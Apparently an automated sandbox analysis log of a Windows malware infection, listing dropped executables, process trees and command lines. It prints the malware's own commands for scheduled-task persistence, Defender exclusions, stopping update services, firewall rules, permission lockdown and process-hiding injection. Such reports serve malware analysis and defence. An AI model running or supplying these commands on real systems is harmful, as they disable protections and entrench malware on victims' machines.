PID 3788 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
PID 3788 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
PID 2156 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
PID 2156 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
PID 2156 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
PID 2540 wrote to memory of 1956 N/A N/A C:\Users\Admin\AppData\Local\Temp\15C9.exe
PID 2540 wrote to memory of 1956 N/A N/A C:\Users\Admin\AppData\Local\Temp\15C9.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\122C.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1604 -ip 1604

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 148

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4780 -ip 4780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3416 -ip 3416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe

C:\Users\Admin\AppData\Local\Temp\1102.exe

C:\Users\Admin\AppData\Local\Temp\1102.exe

C:\Users\Admin\AppData\Local\Temp\122C.exe

C:\Users\Admin\AppData\Local\Temp\122C.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\12E9.bat

"C:\Users\Admin\AppData\Local\Temp\12E9.bat"

C:\Users\Admin\AppData\Local\Temp\1480.exe

C:\Users\Admin\AppData\Local\Temp\1480.exe

C:\Users\Admin\AppData\Local\Temp\15C9.exe

C:\Users\Admin\AppData\Local\Temp\15C9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13B2.tmp\13B3.tmp\13B4.bat C:\Users\Admin\AppData\Local\Temp\12E9.bat"

C:\Users\Admin\AppData\Local\Temp\1983.exe

C:\Users\Admin\AppData\Local\Temp\1983.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3092 -ip 3092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1716 -ip 1716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2736 -ip 2736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3784 -ip 3784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 384

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3784 -s 540

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,8913940286012841717,6794354622792834989,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\6013.exe

C:\Users\Admin\AppData\Local\Temp\6013.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\75BF.exe

C:\Users\Admin\AppData\Local\Temp\75BF.exe

C:\Users\Admin\AppData\Local\Temp\79A8.exe

C:\Users\Admin\AppData\Local\Temp\79A8.exe

C:\Users\Admin\AppData\Local\Temp\7B00.exe

C:\Users\Admin\AppData\Local\Temp\7B00.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=79A8.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=79A8.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb67bd46f8,0x7ffb67bd4708,0x7ffb67bd4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,9120021826305230177,15007795868386864131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6996 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
